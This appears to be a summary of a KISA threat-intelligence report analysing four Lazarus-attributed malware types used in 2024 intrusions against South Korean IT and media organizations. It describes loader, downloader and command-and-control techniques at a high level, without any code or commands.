2024_하반기_사이버_위협_동향_보고서.pdf (9 MB)

KISA analyzes four malware types attributed to Lazarus activity observed in 2024 incidents affecting South Korean private-sector organizations, including IT companies and a major media company. The first type uses DLL side-loading, MachineGuid-based CRC32 checks, AES-128 and RC6 decryption, encrypted configuration files, and a multi-threaded remote-control component that communicates with command-and-control servers over POST requests. Another case involved hands-on attacker activity using certutil.exe to download a disguised payload and rundll32.exe to execute it, showing Living-off-the-Land tradecraft around a packed, Base64-encoded loader. KISA also details SCOUT downloader variants hidden in registry data or specific file paths, with RC4-protected configuration and window-message-based execution, and notes a separate malware type abusing NTFS Alternate Data Streams. The findings matter because they show Lazarus continuing to use modular loaders, victim-specific execution checks, stealthy storage, and remote-control tooling in domestic intrusions aimed at sensitive information theft.